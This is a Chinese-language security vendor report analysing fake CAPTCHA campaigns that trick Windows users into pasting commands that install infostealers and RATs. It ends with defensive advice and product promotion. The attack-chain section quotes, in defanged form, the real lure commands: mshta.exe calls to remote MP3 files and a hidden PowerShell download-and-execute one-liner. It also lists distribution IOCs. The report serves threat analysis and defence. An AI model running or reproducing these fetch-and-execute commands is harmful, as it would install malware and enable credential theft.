虚假CAPTCHA攻击通过多阶段载荷链部署信息窃取器和RAT

报告摘要

趋势科技研究团队发现了一系列虚假CAPTCHA页面，诱骗用户将恶意命令粘贴到Windows运行对话框中。这些攻击活动通过钓鱼邮件、恶意广告或SEO投毒方式分发嵌有混淆JavaScript的文件（如MP3、PDF）。载荷使用mshta.exe或PowerShell在内存中执行，通常能绕过传统的基于文件的检测。

这些攻击可实现数据外泄、凭据窃取、远程访问，并通过Lumma Stealer、Rhadamanthys、AsyncRAT、Emmenhtal和XWorm等恶意软件部署加载器。业务风险包括终端被入侵、未经授权的数据访问以及通过持久后门和C&C通道造成的运营中断。

运行Windows环境且脚本执行限制最少的组织会受到影响。这些活动滥用了多个合法平台，包括文件共享服务、内容和搜索平台、音乐存储库、URL重定向器和文档托管服务。攻击利用了用户对CAPTCHA界面和熟悉品牌的信任。

禁用运行对话框和公共文件共享平台的访问，以及强化浏览器设置，可以显著减少对此威胁的暴露。请参阅下面的缓解指南，了解其他最佳实践以及趋势科技解决方案如何帮助防御这些攻击。

趋势Vision One™检测并阻止了本博客中讨论的IOC。趋势Vision One客户还可以访问狩猎查询、威胁洞察和威胁情报报告，以获取有关这些攻击的丰富上下文和最新更新。

攻击链分析

初始访问

用户遇到模仿合法人工验证提示的CAPTCHA页面，通常是在浏览看似无害的内容网站时。在某些情况下，钓鱼邮件用于将用户重定向到这些欺骗性页面。页面会指示用户将命令复制并粘贴到运行对话框（Win + R）中作为“验证”过程的一部分。一旦执行，该命令将启动恶意脚本，在机器上安装各种威胁。

以下是我们分析中观察到的一些用户被提示运行的命令：

1
2
3

mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203
mshta.exe hxxps://zb-files[.]oss-ap-southeast-1[.]aliyuncs[.]com/DPST_doc.mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 815403
PowerShell.exe -W Hidden -command $uri = 'hxxps[://]fessoclick[.]com/clck/dub.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content”

对钓鱼邮件的分析揭示了重复出现的主题。主题行涉及客人遗留物品、制造紧迫感，并引发对安全性或保密性的担忧。这些邮件通常提到据称遗留的特定物品，并使用正式、专业的语气来增强可信度并促使用户迅速采取行动。

在某些情况下，钓鱼邮件附加PDF而不是包含直接链接。一旦打开，PDF会将用户重定向到虚假CAPTCHA登录页面。

执行

为了清晰起见，我们重点分析将恶意脚本嵌入MP3文件的虚假CAPTCHA攻击，考虑到其独特技术。虽然特定脚本和阶段可能因事件而异，但整体模式和行为保持一致。

遥测数据表明，mshta执行文件lyricalsync.mp3，这是一个托管在hxxps://ernie[.]shop上的特制MP3文件。

威胁情报识别了与hxxps://ernier[.]shop/lyricalsync[.]mp3相关的多个引荐URL。访问这些URL会导致显示虚假CAPTCHA的登录页面，指示用户将恶意命令复制并粘贴到运行对话框中。

每个虚假CAPTCHA页面包含一个脚本，动态生成mshta命令并将其复制到用户的剪贴板。该命令指向托管恶意HTA或MP3文件的远程站点。命令经过Base64编码，并使用JavaScript自动解码并复制到剪贴板。

lyricalsync.mp3文件包含具有多层编码的JavaScript：首先是Base64，然后是十六进制。乍一看，它似乎是一个正常的音频文件——播放时，它会播放Reign on Me的歌曲"Done With You"。

对来自多个案例的MP3文件头部分析揭示了一致的模式。许多似乎源自免版税音乐网站www[.]jamendo[.]com。威胁行为者似乎下载这些合法的音频文件，注入恶意JavaScript，并将其重新用作恶意软件分发载体。

当lyricalsync.mp3通过mshta执行时，它会启动一个多阶段反混淆过程，旨在规避检测机制。

最终解码的PowerShell脚本最初启动一个新的PowerShell进程，具有无限制执行策略且无用户配置文件，以避免检测。然后创建一个WebClient对象来连接并从另一个URL下载文件。

有效载荷归属分析

我们对虚假CAPTCHA技术的分析揭示了与一系列已知恶意软件家族相关但相互关联的多样化IOC。通过URL关系和VirusTotal的遥测数据，我们在分发基础设施和恶意软件家族之间建立了高置信度的链接。

Lumma Stealer

多个URL通过VirusTotal的关系图指向已知的Lumma Stealer分发节点。

Emmenhtal

对Emmenhtal恶意软件的归属基于观察到的C&C基础设施和恶意软件分发机制的重叠。

Rhadamanthys

这种联系得到了通过历史恶意软件提交和存储库关系观察到的基础设施重叠的支持。

AsyncRAT / XWorm

共享的分发URL 185[.]7[.]214[.]108/a[.]mp4被发现托管被标记为AsyncRAT和XWorm的有效载荷。

安全防护实践

这些虚假CAPTCHA活动继续变得越来越复杂，威胁行为者采用高级技术，如多阶段混淆、内存中脚本执行，以及在某些情况下将混淆的JavaScript隐藏在看似良性的MP3文件中。

主要的交付方法包括钓鱼邮件（带有嵌入的恶意链接或附件）以及不可信网站上的恶意广告。

无论入口点如何，攻击链通常依赖于混淆的JavaScript或PowerShell脚本来检索和执行各种有效载荷。这些通常借助像Emmenhtal这样的加载器来下载信息窃取器（如Lumma Stealer和Rhadamanthys）或RAT（如AsyncRAT和XWorm）。

我们期望未来的虚假CAPTCHA攻击将有效载荷嵌入到MP3和HTA文件之外的其他不常见格式中。虽然恶意广告和钓鱼邮件仍然是主要的分发方法，但攻击者可能会开始尝试使用社交媒体平台或消息应用程序来传递缩短或伪装的链接。

以下是防御这些攻击的一些安全最佳实践：

1. 禁用运行对话框（Win + R）访问：在限制用户对管理工具和脚本执行的访问优先的环境中，这是可取的。
2. 应用最小权限原则：除了限制运行对话框，确保用户仅被授予执行任务所需的权限。
3. 限制对未经批准的工具和文件共享平台的访问：维护批准的软件基线，并在不需要业务使用时阻止对公共文件共享服务的访问。
4. 监控异常的剪贴板和进程行为：监控异常的剪贴板活动可以提供早期警告信号。
5. 强化浏览器配置：配置浏览器以减少对SEO投毒、恶意广告和基于脚本的威胁的暴露。
6. 启用内存保护功能：在Windows环境中有内置的OS级控件，可以启用以检测内存中执行、反射DLL注入和其他规避技术。
7. 投资用户教育：培训用户识别可疑链接或钓鱼邮件可以显著降低被入侵的风险。

趋势科技解决方案

趋势科技的终端和网络解决方案包括行为监控、预测性机器学习（PML）和Web信誉服务（WRS），可检测行为异常、先发制人地阻止未知威胁并防止访问恶意URL。

趋势Vision One™是唯一由AI驱动的企业网络安全平台，集中了网络风险暴露管理、安全运营和强大的分层保护。这种全面方法帮助您预测和预防威胁，加速在整个数字资产中的主动安全结果。